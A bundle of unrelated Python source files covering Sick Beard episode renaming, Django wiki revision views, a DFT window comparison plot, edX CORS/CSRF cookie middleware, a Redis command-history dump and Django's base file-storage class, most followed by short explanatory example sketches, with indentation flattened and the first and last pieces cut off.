if name and name.lower().endswith('.nzb'):
name = name.rpartition('.')[0]
return name
def release_group(name):
if not name:
return ''
np = NameParser(name)
try:
parse_result = np.parse(name)
except InvalidNameException, e:
logger.log(u"Unable to get parse release_group: "+ex(e), logger.DEBUG)
return ''
if not parse_result.release_group:
return ''
return parse_result.release_group
epStatus, epQual = Quality.splitCompositeStatus(self.status) #@UnusedVariable
return {
'%SN': self.show.name,
'%S.N': dot(self.show.name),
'%S_N': us(self.show.name),
'%EN': ep_name,
'%E.N': dot(ep_name),
'%E_N': us(ep_name),
'%QN': Quality.qualityStrings[epQual],
'%Q.N': dot(Quality.qualityStrings[epQual]),
'%Q_N': us(Quality.qualityStrings[epQual]),
'%S': str(self.season),
'%0S': '%02d' % self.season,
'%E': str(self.episode),
'%0E': '%02d' % self.episode,
'%RN': release_name(self.release_name),
'%RG': release_group(self.release_name),
'%AD': str(self.airdate).replace('-', ' '),
'%A.D': str(self.airdate).replace('-', '.'),
'%A_D': us(str(self.airdate)),
'%A-D': str(self.airdate),
'%Y': str(self.airdate.year),
'%M': str(self.airdate.month),
'%D': str(self.airdate.day),
'%0M': '%02d' % self.airdate.month,
'%0D': '%02d' % self.airdate.day,
}
def _format_string(self, pattern, replace_map):
"""
Replaces all template strings with the correct value
"""
result_name = pattern
# do the replacements
for cur_replacement in sorted(replace_map.keys(), reverse=True):
result_name = result_name.replace(cur_replacement, helpers.sanitizeFileName(replace_map[cur_replacement]))
result_name = result_name.replace(cur_replacement.lower(), helpers.sanitizeFileName(replace_map[cur_replacement].lower()))
return result_name
def _format_pattern(self, pattern=None, multi=None):
"""
Manipulates an episode naming pattern and then fills the template in
"""
if pattern == None:
pattern = sickbeard.NAMING_PATTERN
if multi == None:
multi = sickbeard.NAMING_MULTI_EP
replace_map = self._replace_map()
result_name = pattern
# if there's no release group then replace it with a reasonable facsimile
if not replace_map['%RN']:
if self.show.air_by_date:
result_name = result_name.replace('%RN', '%S.N.%A.D.%E.N')
result_name = result_name.replace('%rn', '%s.n.%A.D.%e.n')
else:
result_name = result_name.replace('%RN', '%S.N.S%0SE%0E.%E.N')
result_name = result_name.replace('%rn', '%s.n.s%0se%0e.%e.n')
result_name = result_name.replace('%RG', '')
result_name = result_name.replace('%rg', '')
if result_name[-1] in ['.','-','_',' ']:
result_name = result_name[:-1]
logger.log(u"Episode has no release name, replacing it with a generic one: "+result_name, logger.DEBUG)
# split off ep name part only
name_groups = re.split(r'[\\/]', result_name)
# figure out the double-ep numbering style for each group, if applicable
for cur_name_group in name_groups:
season_format = sep = ep_sep = ep_format = None
season_ep_regex = '''
(?P<pre_sep>[ _.-]*)
((?:s(?:eason|eries)?\s*)?%0?S(?![._]?N))
(.*?)
(%0?E(?![._]?N))
(?P<post_sep>[ _.-]*)
'''
ep_only_regex = '(E?%0?E(?![._]?N))'
# try the normal way
season_ep_match = re.search(season_ep_regex, cur_name_group, re.I|re.X)
ep_only_match = re.search(ep_only_regex, cur_name_group, re.I|re.X)
# if we have a season and episode then collect the necessary data
if season_ep_match:
season_format = season_ep_match.group(2)
ep_sep = season_ep_match.group(3)
ep_format = season_ep_match.group(4)
sep = season_ep_match.group('pre_sep')
if not sep:
sep = season_ep_match.group('post_sep')
if not sep:
sep = ' '
# force 2-3-4 format if they chose to extend
if multi in (NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED):
ep_sep = '-'
regex_used = season_ep_regex
# if there's no season then there's not much choice so we'll just force them to use 03-04-05 style
elif ep_only_match:
season_format = ''
ep_sep = '-'
ep_format = ep_only_match.group(1)
sep = ''
regex_used = ep_only_regex
else:
continue
# we need at least this much info to continue
if not ep_sep or not ep_format:
continue
# start with the ep string, eg. E03
ep_string = self._format_string(ep_format.upper(), replace_map)
for other_ep in self.relatedEps:
# for limited extend we only append the last ep
if multi in (NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED) and other_ep != self.relatedEps[-1]:
continue
elif multi == NAMING_DUPLICATE:
# add " - S01"
ep_string += sep + season_format
elif multi == NAMING_SEPARATED_REPEAT:
ep_string += sep
# add "E04"
ep_string += ep_sep
if multi == NAMING_LIMITED_EXTEND_E_PREFIXED:
ep_string += 'E'
ep_string += other_ep._format_string(ep_format.upper(), other_ep._replace_map())
if season_ep_match:
regex_replacement = r'\g<pre_sep>\g<2>\g<3>' + ep_string + r'\g<post_sep>'
elif ep_only_match:
regex_replacement = ep_string
# fill out the template for this piece and then insert this piece into the actual pattern
cur_name_group_result = re.sub('(?i)(?x)'+regex_used, regex_replacement, cur_name_group)
#cur_name_group_result = cur_name_group.replace(ep_format, ep_string)
#logger.log(u"found "+ep_format+" as the ep pattern using "+regex_used+" and replaced it with "+regex_replacement+" to result in "+cur_name_group_result+" from "+cur_name_group, logger.DEBUG)
result_name = result_name.replace(cur_name_group, cur_name_group_result)
result_name = self._format_string(result_name, replace_map)
logger.log(u"formatting pattern: "+pattern+" -> "+result_name, logger.DEBUG)
return result_name
def proper_path(self):
"""
Figures out the path where this episode SHOULD live according to the renaming rules, relative to the show dir
"""
result = self.formatted_filename()
# if they want us to flatten it and we're allowed to flatten it then we will
if self.show.flatten_folders and not sickbeard.NAMING_FORCE_FOLDERS:
return result
# if not we append the folder on and use that
else:
result = ek.ek(os.path.join, self.formatted_dir(), result)
return result
def formatted_dir(self, pattern=None, multi=None):
"""
Just the folder name of the episode
"""
if pattern == None:
# we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep
if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps:
pattern = sickbeard.NAMING_ABD_PATTERN
else:
pattern = sickbeard.NAMING_PATTERN
# split off the dirs only, if they exist
name_groups = re.split(r'[\\/]', pattern)
if len(name_groups) == 1:
return ''
else:
return self._format_pattern(os.sep.join(name_groups[:-1]), multi)
def formatted_filename(self, pattern=None, multi=None):
"""
Just the filename of the episode, formatted based on the naming settings
"""
if pattern == None:
# we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep
if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps:
pattern = sickbeard.NAMING_ABD_PATTERN
else:
pattern = sickbeard.NAMING_PATTERN
# split off the filename only, if dirs exist in the pattern
name_groups = re.split(r'[\\/]', pattern)
return self._format_pattern(name_groups[-1], multi)
def rename(self):
"""
Renames an episode file and all related files to the location and filename as specified
in the naming settings.
"""
if not ek.ek(os.path.isfile, self.location):
logger.log(u"Can't perform rename on " + self.location + " when it doesn't exist, skipping", logger.WARNING)
return
proper_path = self.proper_path()
absolute_proper_path = ek.ek(os.path.join, self.show.location, proper_path)
absolute_current_path_no_ext, file_ext = os.path.splitext(self.location)
related_subs = []
current_path = absolute_current_path_no_ext
if absolute_current_path_no_ext.startswith(self.show.location):
current_path = absolute_current_path_no_ext[len(self.show.location):]
logger.log(u"Renaming/moving episode from the base path " + self.location + " to " + absolute_proper_path, logger.DEBUG)
# if it's already named correctly then don't do anything
if proper_path == current_path:
logger.log(str(self.tvdbid) + ": File " + self.location + " is already named correctly, skipping", logger.DEBUG)
return
related_files = postProcessor.PostProcessor(self.location)._list_associated_files(self.location)
if self.show.subtitles and sickbeard.SUBTITLES_DIR != '':
related_subs = postProcessor.PostProcessor(self.location)._list_associated_files(sickbeard.SUBTITLES_DIR, subtitles_only=self.location)
absolute_proper_subs_path = ek.ek(os.path.join, sickbeard.SUBTITLES_DIR, self.formatted_filename())
if self.show.subtitles and sickbeard.SUBTITLES_DIR_SUB:
related_subs = postProcessor.PostProcessor(self.location)._list_associated_files(os.path.join(os.path.dirname(self.location),"Subs"), subtitles_only=self.location)
absolute_proper_subs_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename())
logger.log(u"Files associated to " + self.location + ": " + str(related_files), logger.DEBUG)
# move the ep file
result = helpers.rename_ep_file(self.location, absolute_proper_path)
# move related files
for cur_related_file in related_files:
cur_result = helpers.rename_ep_file(cur_related_file, absolute_proper_path)
if cur_result == False:
logger.log(str(self.tvdbid) + ": Unable to rename file " + cur_related_file, logger.ERROR)
for cur_related_sub in related_subs:
cur_result = helpers.rename_ep_file(cur_related_sub, absolute_proper_subs_path)
if cur_result == False:
logger.log(str(self.tvdbid) + ": Unable to rename file " + cur_related_sub, logger.ERROR)
# save the ep
with self.lock:
if result != False:
self.location = absolute_proper_path + file_ext
for relEp in self.relatedEps:
relEp.location = absolute_proper_path + file_ext
# in case something changed with the metadata just do a quick check
for curEp in [self] + self.relatedEps:
curEp.checkForMetaFiles()
# save any changes to the database
with self.lock:
self.saveToDB()
for relEp in self.relatedEps:
relEp.saveToDB()
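# Every TVEpisode attribute above is declared as `property(getter, dirty_setter(...))`
# so that saveToDB() can skip the database write when nothing has changed.  The
# minimal, self-contained sketch below shows that dirty-flag pattern in isolation;
# the `_dirty_setter` helper and `_Record` class are made up for this example and
# are not Sick Beard's actual implementation.
def _dirty_setter(attr_name):
    """Return a property setter that stores the value and flags the object dirty."""
    def _setter(obj, value):
        if getattr(obj, attr_name) != value:
            setattr(obj, attr_name, value)
            obj.dirty = True
    return _setter

class _Record(object):
    def __init__(self, name=""):
        self._name = name
        self.dirty = True  # new objects start dirty so the first save always runs

    name = property(lambda self: self._name, _dirty_setter("_name"))

    def save(self, force_save=False):
        """Pretend-save: only touches storage when something changed (or force_save)."""
        if not self.dirty and not force_save:
            return False
        # ... persist self._name somewhere ...
        self.dirty = False
        return True

if __name__ == "__main__":
    rec = _Record("Pilot")
    print(rec.save())        # True  - first save, record starts dirty
    rec.name = "Pilot"       # assigning the same value leaves the record clean
    print(rec.save())        # False - nothing to do
    rec.name = "Pilot (2)"   # a real change sets the dirty flag again
    print(rec.save())        # True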
|
from django.shortcuts import render_to_response
from django.http import HttpResponseBadRequest, HttpResponseRedirect, Http404
from django.template import RequestContext
from django.db import transaction
from django.core import paginator
from reversion import models
from reversion import revision
from wikify.models import VersionMeta
from wikify import utils
@transaction.commit_on_success
def edit(request, model, object_id):
"""Edit or create a page."""
form_class = utils.get_model_wiki_form(model)
version = None
if request.method == 'POST':
try:
page = model.objects.get(pk=object_id)
except model.DoesNotExist:
page = model(pk=object_id)
form = form_class(request.POST, instance=page)
if form.is_valid():
with revision:
# Save the author, use our metadata model if user is anonymous
if not request.user.is_anonymous():
revision.user = request.user
else:
ip_address = request.META.get('HTTP_X_FORWARDED_FOR',
request.META.get('REMOTE_ADDR'))
if ip_address:
revision.add_meta(VersionMeta,
ip_address=ip_address)
# Save a comment for the revision
if form.cleaned_data.get('wikify_comment'):
revision.comment = form.cleaned_data['wikify_comment']
form.save()
# Successfully saved the page, now return to the 'read' view
return HttpResponseRedirect(request.path)
else:
if request.GET.get('version_id'):
# User is editing the page based on an older version
try:
version_id = int(request.GET.get('version_id'))
version = (models.Version.objects.get_for_object_reference(
model, object_id)
.get(id=version_id))
page = version.object_version.object
except (ValueError, models.Version.DoesNotExist):
raise Http404('Version not found')
form = form_class(instance=page)
else:
try:
page = model.objects.get(pk=object_id)
form = form_class(instance=page)
except model.DoesNotExist:
form = form_class()
return render_to_response('wikify/edit.html',
{'form': form,
'object_id': object_id,
'version': version},
context_instance=RequestContext(request))
def version(request, model, object_id):
"""Returns a versioned view of the given instance."""
try:
version_id = int(request.GET.get('version_id'))
version = (models.Version.objects.get_for_object_reference(model,
object_id)
.get(id=version_id))
instance = version.object_version.object
except (ValueError, models.Version.DoesNotExist):
raise Http404('Version not found')
return render_to_response('wikify/version.html',
{'instance': instance,
'fields': list(utils.model_field_iterator(
instance)),
'version': version},
context_instance=RequestContext(request))
def versions(request, model, object_id, paginate=20):
"""Returns a paginated list of all versions of the given instance."""
all_versions = (models.Version.objects.get_for_object_reference(model,
object_id)
.reverse()
.select_related("revision"))
p = paginator.Paginator(all_versions, paginate)
page_no = request.GET.get('page', 1)
try:
versions = p.page(page_no)
except paginator.PageNotAnInteger:
versions = p.page(1)
except paginator.EmptyPage:
versions = p.page(p.num_pages)
return render_to_response('wikify/versions.html',
{'object_id': object_id,
'versions': versions},
context_instance=RequestContext(request))
def diff(request, model, object_id):
"""Returns the difference between the given version and the previous one."""
versions = models.Version.objects.get_for_object_reference(model, object_id)
try:
version_id = int(request.GET.get('version_id'))
# Get version and make sure it belongs to the given page
new_version = versions.get(id=version_id)
except (ValueError, models.Version.DoesNotExist):
raise Http404("Version not found")
old_version_q = versions.filter(id__lt=version_id).reverse()
old_version = old_version_q[0] if old_version_q else None
# Get the next version so we can provide a link
next_version_q = versions.filter(id__gt=version_id)
next_version = next_version_q[0] if next_version_q else None
context = {'old_version': old_version,
'new_version': new_version,
'fields': list(utils.version_field_iterator(old_version,
new_version)),
'next_version': next_version}
return render_to_response('wikify/diff.html',
context,
context_instance=RequestContext(request))
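# A hypothetical urls.py wiring (Django 1.8+ style URLconf) for the views above,
# covering one wiki-enabled model.  The `Page` model, the `wikify.views` import
# path and the URL names are assumptions made for this sketch; wikify itself may
# ship different URL helpers.
from functools import partial

from django.conf.urls import url

from myapp.models import Page              # assumed concrete wiki page model
from wikify import views as wikify_views   # assumed location of this module

urlpatterns = [
    url(r'^(?P<object_id>[^/]+)/edit/$',
        partial(wikify_views.edit, model=Page), name='wikify_edit'),
    url(r'^(?P<object_id>[^/]+)/version/$',
        partial(wikify_views.version, model=Page), name='wikify_version'),
    url(r'^(?P<object_id>[^/]+)/versions/$',
        partial(wikify_views.versions, model=Page), name='wikify_versions'),
    url(r'^(?P<object_id>[^/]+)/diff/$',
        partial(wikify_views.diff, model=Page), name='wikify_diff'),
]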
|
import matplotlib.pyplot as plt
import numpy as np
import time, os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../../software/models/'))
import dftModel as DF
import utilFunctions as UF
from scipy.fftpack import fft, ifft
import math
(fs, x) = UF.wavread('../../../sounds/oboe-A4.wav')
N = 512
pin = 5000
w = np.ones(501)
hM1 = int(math.floor((w.size+1)/2))
hM2 = int(math.floor(w.size/2))
x1 = x[pin-hM1:pin+hM2]
plt.figure(1, figsize=(9.5, 7))
plt.subplot(4,1,1)
plt.plot(np.arange(-hM1, hM2), x1, lw=1.5)
plt.axis([-hM1, hM2, min(x1), max(x1)])
plt.title('x (oboe-A4.wav)')
mX, pX = DF.dftAnal(x1, w, N)
mX = mX - max(mX)
plt.subplot(4,1,2)
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,N/4,-70,0])
plt.title ('mX (rectangular window)')
w = np.hamming(501)
mX, pX = DF.dftAnal(x1, w, N)
mX = mX - max(mX)
plt.subplot(4,1,3)
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,N/4,-70,0])
plt.title ('mX (hamming window)')
w = np.blackman(501)
mX, pX = DF.dftAnal(x1, w, N)
mX = mX - max(mX)
plt.subplot(4,1,4)
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,N/4,-70,0])
plt.title ('mX (blackman window)')
plt.tight_layout()
plt.savefig('windows.png')
plt.show()
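# The figure above contrasts rectangular, Hamming and Blackman windows on the same
# oboe frame.  The standalone sketch below quantifies the usual trade-off directly
# from the windows' own transforms (no wav file needed): the main lobe widens while
# the side lobes drop as the window gets smoother.  The zero-padding factor is an
# arbitrary choice made for this example.
import numpy as np

M = 501                        # window length, same as above
Nfft = 8 * 1024                # generous zero-padding for a smooth spectrum
for label, w in (('rectangular', np.ones(M)),
                 ('hamming', np.hamming(M)),
                 ('blackman', np.blackman(M))):
    W = np.abs(np.fft.fft(w, Nfft))
    W = 20 * np.log10(W / W.max() + 1e-12)   # dB, normalized to a 0 dB peak
    # the first local minimum after the peak marks the edge of the main lobe
    edge = 1
    while edge < Nfft // 2 and W[edge + 1] < W[edge]:
        edge += 1
    mainlobe_bins = 2.0 * edge * M / Nfft    # null-to-null width in bins of an M-point DFT
    peak_sidelobe = W[edge:Nfft // 2].max()  # highest side-lobe level in dB
    print('%-12s main lobe ~%.1f bins, peak side lobe %.1f dB' %
          (label, mainlobe_bins, peak_sidelobe))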
|
"""
Middleware for handling CSRF checks with CORS requests
CSRF and referrer domain checks
-------------------------------
When processing HTTPS requests, the default CSRF middleware checks that the referer
domain and protocol are the same as the request's domain and protocol. This is meant
to avoid a type of attack for sites which serve their content with both HTTP and HTTPS,
with a man in the middle on the HTTP requests.
https://github.com/django/django/blob/b91c385e324f1cb94d20e2ad146372c259d51d3b/django/middleware/csrf.py#L117
This doesn't work well with CORS requests, which aren't vulnerable to this attack when
the server from which the request is coming uses HTTPS too, as it prevents the man in the
middle attack vector.
We thus do the CSRF check of requests coming from an authorized CORS host separately
in this middleware, applying the same protections as the default CSRF middleware, but
without the referrer check, when both the request and the referer use HTTPS.
CSRF cookie domains
-------------------
In addition, in order to make cross-domain AJAX calls to CSRF-protected end-points,
we need to send the CSRF token in the HTTP header of the request.
The simple way to do this would be to set the CSRF_COOKIE_DOMAIN to ".edx.org",
but unfortunately this can cause problems. For example, suppose that
"first.edx.org" sets the cookie with domain ".edx.org", but "second.edx.org"
sets a cookie with domain "second.edx.org". In this case, the browser
would have two different CSRF tokens set (one for each cookie domain),
which can cause non-deterministic failures depending on which cookie
is sent first.
For this reason, we add a second cookie that (a) has the domain set to ".edx.org",
but (b) does NOT have the same name as the CSRF_COOKIE_NAME. Clients making
cross-domain requests can use this cookie instead of the subdomain-specific
CSRF cookie.
"""
import logging
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, MiddlewareNotUsed
from .helpers import is_cross_domain_request_allowed, skip_cross_domain_referer_check
# TODO: Remove Django 1.11 upgrade shim
# SHIM: Remove birdcage references post-1.11 upgrade as it is only in place to help during that deployment
if django.VERSION < (1, 9):
from birdcage.v1_11.csrf import CsrfViewMiddleware
else:
from django.middleware.csrf import CsrfViewMiddleware
log = logging.getLogger(__name__)
class CorsCSRFMiddleware(CsrfViewMiddleware):
"""
Middleware for handling CSRF checks with CORS requests
"""
def __init__(self):
"""Disable the middleware if the feature flag is disabled. """
if not settings.FEATURES.get('ENABLE_CORS_HEADERS'):
raise MiddlewareNotUsed()
def process_view(self, request, callback, callback_args, callback_kwargs):
"""Skip the usual CSRF referer check if this is an allowed cross-domain request. """
if not is_cross_domain_request_allowed(request):
log.debug("Could not disable CSRF middleware referer check for cross-domain request.")
return
with skip_cross_domain_referer_check(request):
return super(CorsCSRFMiddleware, self).process_view(request, callback, callback_args, callback_kwargs)
class CsrfCrossDomainCookieMiddleware(object):
"""Set an additional "cross-domain" CSRF cookie.
Usage:
1) Decorate a view with `@ensure_csrf_cookie_cross_domain`.
2) Set `CROSS_DOMAIN_CSRF_COOKIE_NAME` and `CROSS_DOMAIN_CSRF_COOKIE_DOMAIN`
in settings.
3) Add the domain to `CORS_ORIGIN_WHITELIST`
4) Enable `FEATURES['ENABLE_CROSS_DOMAIN_CSRF_COOKIE']`
For testing, it is often easier to relax the security checks by setting:
* `CORS_ALLOW_INSECURE = True`
* `CORS_ORIGIN_ALLOW_ALL = True`
"""
def __init__(self):
"""Disable the middleware if the feature is not enabled. """
if not settings.FEATURES.get('ENABLE_CROSS_DOMAIN_CSRF_COOKIE'):
raise MiddlewareNotUsed()
if not getattr(settings, 'CROSS_DOMAIN_CSRF_COOKIE_NAME', ''):
raise ImproperlyConfigured(
"You must set `CROSS_DOMAIN_CSRF_COOKIE_NAME` when "
"`FEATURES['ENABLE_CROSS_DOMAIN_CSRF_COOKIE']` is True."
)
if not getattr(settings, 'CROSS_DOMAIN_CSRF_COOKIE_DOMAIN', ''):
raise ImproperlyConfigured(
"You must set `CROSS_DOMAIN_CSRF_COOKIE_DOMAIN` when "
"`FEATURES['ENABLE_CROSS_DOMAIN_CSRF_COOKIE']` is True."
)
def process_response(self, request, response):
"""Set the cross-domain CSRF cookie. """
# Check whether this is a secure request from a domain on our whitelist.
if not is_cross_domain_request_allowed(request):
log.debug("Could not set cross-domain CSRF cookie.")
return response
# Check whether (a) the CSRF middleware has already set a cookie, and
# (b) this is a view decorated with `@ensure_csrf_cookie_cross_domain`
# If so, we can send the cross-domain CSRF cookie.
should_set_cookie = (
request.META.get('CROSS_DOMAIN_CSRF_COOKIE_USED', False) and
request.META.get('CSRF_COOKIE_USED', False) and
request.META.get('CSRF_COOKIE') is not None
)
if should_set_cookie:
# This is very similar to the code in Django's CSRF middleware
# implementation, with two exceptions:
# 1) We change the cookie name and domain so it can be used cross-domain.
# 2) We always set "secure" to True, so that the CSRF token must be
# sent over a secure connection.
response.set_cookie(
settings.CROSS_DOMAIN_CSRF_COOKIE_NAME,
request.META['CSRF_COOKIE'],
max_age=settings.CSRF_COOKIE_AGE,
domain=settings.CROSS_DOMAIN_CSRF_COOKIE_DOMAIN,
path=settings.CSRF_COOKIE_PATH,
secure=True
)
log.debug(
"Set cross-domain CSRF cookie '%s' for domain '%s'",
settings.CROSS_DOMAIN_CSRF_COOKIE_NAME,
settings.CROSS_DOMAIN_CSRF_COOKIE_DOMAIN
)
return response
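# A sketch of the Django settings the two middlewares above expect, following the
# steps listed in the CsrfCrossDomainCookieMiddleware docstring.  The domains, the
# cookie name and the dotted middleware paths below are placeholders for this
# example; the real FEATURES dict and middleware module path depend on the project.
FEATURES = {
    'ENABLE_CORS_HEADERS': True,
    'ENABLE_CROSS_DOMAIN_CSRF_COOKIE': True,
}

CORS_ORIGIN_WHITELIST = (
    'courses.example.org',                  # hosts allowed to make cross-domain calls
)

CROSS_DOMAIN_CSRF_COOKIE_NAME = 'example_csrftoken'
CROSS_DOMAIN_CSRF_COOKIE_DOMAIN = '.example.org'

MIDDLEWARE_CLASSES = (
    # ... the rest of the middleware stack ...
    'cors_csrf.middleware.CorsCSRFMiddleware',               # placeholder dotted path
    'cors_csrf.middleware.CsrfCrossDomainCookieMiddleware',  # placeholder dotted path
)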
|
#!/usr/bin/env python
# encoding: utf-8
# Copyright 2014 Xinyu, He <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import json
import redis
HISTORY_CMD_KEY = "lehome:cmd_history_list"
r = redis.Redis(host='localhost', port=6379)
print "dbsize:", r.dbsize()
print "num of keys:", r.keys()
print "volume:", r.get("lehome:last_volume")
historys = r.lrange(HISTORY_CMD_KEY, 0, -1)
print "history size:", len(historys)
# r.delete(HISTORY_CMD_KEY)
for i in range(1, 10):
print historys[-i]
look_up_dict = {}
for item in historys:
item = item.split(":", 1)  # split only on the first ":" so commands containing ":" stay intact
stmp = int(item[0])
cmd = item[1]
if cmd not in look_up_dict:
look_up_dict[cmd] = {'count': 0}
look_up_dict[cmd]['count'] = look_up_dict[cmd]['count'] + 1
print "dict size:", len(look_up_dict)
with open("../usr/history.json", "w") as f:
f.write(json.dumps(look_up_dict))
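# A small companion sketch that reads the history.json file written above and
# prints the most frequently used commands; illustration only, not part of the
# original script.
import json

with open("../usr/history.json") as f:
    counts = json.load(f)

top = sorted(counts.items(), key=lambda kv: kv[1]['count'], reverse=True)[:10]
for cmd, info in top:
    print('%5d  %s' % (info['count'], cmd))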
|
import errno
import os
import warnings
from datetime import datetime
from django.conf import settings
from django.core.exceptions import SuspiciousFileOperation
from django.core.files import File, locks
from django.core.files.move import file_move_safe
from django.core.signals import setting_changed
from django.utils import timezone
from django.utils._os import abspathu, safe_join
from django.utils.crypto import get_random_string
from django.utils.deconstruct import deconstructible
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import filepath_to_uri, force_text
from django.utils.functional import LazyObject, cached_property
from django.utils.module_loading import import_string
from django.utils.six.moves.urllib.parse import urljoin
from django.utils.text import get_valid_filename
__all__ = ('Storage', 'FileSystemStorage', 'DefaultStorage', 'default_storage')
class Storage(object):
"""
A base storage class, providing some default behaviors that all other
storage systems can inherit or override, as necessary.
"""
# The following methods represent a public interface to private methods.
# These shouldn't be overridden by subclasses unless absolutely necessary.
def open(self, name, mode='rb'):
"""
Retrieves the specified file from storage.
"""
return self._open(name, mode)
def save(self, name, content, max_length=None):
"""
Saves new content to the file specified by name. The content should be
a proper File object or any python file-like object, ready to be read
from the beginning.
"""
# Get the proper name for the file, as it will actually be saved.
if name is None:
name = content.name
if not hasattr(content, 'chunks'):
content = File(content)
name = self.get_available_name(name, max_length=max_length)
name = self._save(name, content)
# Store filenames with forward slashes, even on Windows
return force_text(name.replace('\\', '/'))
# These methods are part of the public API, with default implementations.
def get_valid_name(self, name):
"""
Returns a filename, based on the provided filename, that's suitable for
use in the target storage system.
"""
return get_valid_filename(name)
def get_available_name(self, name, max_length=None):
"""
Returns a filename that's free on the target storage system, and
available for new content to be written to.
"""
dir_name, file_name = os.path.split(name)
file_root, file_ext = os.path.splitext(file_name)
# If the filename already exists, add an underscore and a random 7
# character alphanumeric string (before the file extension, if one
# exists) to the filename until the generated filename doesn't exist.
# Truncate original name if required, so the new filename does not
# exceed the max_length.
while self.exists(name) or (max_length and len(name) > max_length):
# file_ext includes the dot.
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
if max_length is None:
continue
# Truncate file_root if max_length exceeded.
truncation = len(name) - max_length
if truncation > 0:
file_root = file_root[:-truncation]
# Entire file_root was truncated in attempt to find an available filename.
if not file_root:
raise SuspiciousFileOperation(
'Storage can not find an available filename for "%s". '
'Please make sure that the corresponding file field '
'allows sufficient "max_length".' % name
)
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
return name
def path(self, name):
"""
Returns a local filesystem path where the file can be retrieved using
Python's built-in open() function. Storage systems that can't be
accessed using open() should *not* implement this method.
"""
raise NotImplementedError("This backend doesn't support absolute paths.")
# The following methods form the public API for storage systems, but with
# no default implementations. Subclasses must implement *all* of these.
def delete(self, name):
"""
Deletes the specified file from the storage system.
"""
raise NotImplementedError('subclasses of Storage must provide a delete() method')
def exists(self, name):
"""
Returns True if a file referenced by the given name already exists in the
storage system, or False if the name is available for a new file.
"""
raise NotImplementedError('subclasses of Storage must provide an exists() method')
def listdir(self, path):
"""
Lists the contents of the specified path, returning a 2-tuple of lists;
the first item being directories, the second item being files.
"""
raise NotImplementedError('subclasses of Storage must provide a listdir() method')
def size(self, name):
"""
Returns the total size, in bytes, of the file specified by name.
"""
raise NotImplementedError('subclasses of Storage must provide a size() method')
def url(self, name):
"""
Returns an absolute URL where the file's contents can be accessed
directly by a Web browser.
"""
raise NotImplementedError('subclasses of Storage must provide a url() method')
def accessed_time(self, name):
"""
Returns the last accessed time (as datetime object) of the file
specified by name. Deprecated: use get_accessed_time() instead.
"""
warnings.warn(
'Storage.accessed_time() is deprecated in favor of get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide an accessed_time() method')
def created_time(self, name):
"""
Returns the creation time (as datetime object) of the file
specified by name. Deprecated: use get_created_time() instead.
"""
warnings.warn(
'Storage.created_time() is deprecated in favor of get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a created_time() method')
def modified_time(self, name):
"""
Returns the last modified time (as datetime object) of the file
specified by name. Deprecated: use get_modified_time() instead.
"""
warnings.warn(
'Storage.modified_time() is deprecated in favor of get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a modified_time() method')
def get_accessed_time(self, name):
"""
Return the last accessed time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_accessed_time() method')
warnings.warn(
'Storage.accessed_time() is deprecated. '
'Storage backends should implement get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.accessed_time(name)
return _possibly_make_aware(dt)
def get_created_time(self, name):
"""
Return the creation time (as a datetime) of the file specified by name.
The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_created_time() method')
warnings.warn(
'Storage.created_time() is deprecated. '
'Storage backends should implement get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.created_time(name)
return _possibly_make_aware(dt)
def get_modified_time(self, name):
"""
Return the last modified time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_modified_time() method')
warnings.warn(
'Storage.modified_time() is deprecated. '
'Storage backends should implement get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.modified_time(name)
return _possibly_make_aware(dt)
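# Everything a concrete backend must supply is listed above: _open()/_save() for the
# actual I/O plus delete(), exists(), listdir(), size() and url().  The tiny in-memory
# backend below is an illustrative sketch only, not a backend Django ships; in user
# code you would import Storage from django.core.files.storage rather than define
# the subclass inside this module.
from django.core.files.base import ContentFile

class InMemoryStorage(Storage):
    """Keep file contents in a dict; handy for tests, useless for production."""

    def __init__(self):
        self._files = {}

    def _open(self, name, mode='rb'):
        return ContentFile(self._files[name], name=name)

    def _save(self, name, content):
        # Storage.save() has already wrapped raw content in a File-like object.
        self._files[name] = content.read()
        return name

    def delete(self, name):
        self._files.pop(name, None)

    def exists(self, name):
        return name in self._files

    def listdir(self, path):
        # Flat namespace: no directories, every stored name is a "file".
        return [], list(self._files)

    def size(self, name):
        return len(self._files[name])

    def url(self, name):
        raise NotImplementedError("In-memory files are not accessible via a URL.")

# Example usage of the sketch:
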